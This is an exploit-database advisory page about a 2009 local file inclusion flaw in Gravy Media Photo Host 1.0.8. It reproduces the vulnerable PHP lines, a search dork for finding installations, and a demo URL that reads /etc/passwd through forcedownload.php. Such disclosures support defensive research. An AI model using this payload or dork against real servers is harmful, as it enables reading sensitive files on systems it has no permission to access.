header-logo
Suggest Exploit
vendor:
Gravy Media Photo Host
by:
Lo$er
7,5
CVSS
HIGH
Local File Inclusion
22
CWE
Product Name: Gravy Media Photo Host
Affected Version From: 1.0.8
Affected Version To: 1.0.8
Patch Exists: Yes
Related CWE: N/A
CPE: a:gravy_media:gravy_media_photo_host:1.0.8
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Gravy Media Photo Host 1.0.8 Local File Inclusion

Gravy Media Photo Host 1.0.8 is vulnerable to Local File Inclusion. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'file' parameter of the 'forcedownload.php' script. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This can allow an attacker to read sensitive files from the server, such as the '/etc/passwd' file.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to apply the patch as soon as possible.
Source

Exploit-DB raw data:

==================================================================
=========Gravy Media Photo Host 1.0.8 Local File Inclusion========
==================================================================

Vendor:http://www.gravy-media.com/
Download:register to download
Dork:"Powered by Gravy Media"
Discovered By:Lo$er

====Vulnerable code(forcedownload.php)====
27. $filename = $_GET['file'];

70. readfile("$filename");
====Demo====

http://www.gravy-media.com/v108/forcedownload.php?file=%2Fetc%2Fpasswd

# milw0rm.com [2009-06-22]

Navigation

Suggest Exploit

Services By CQR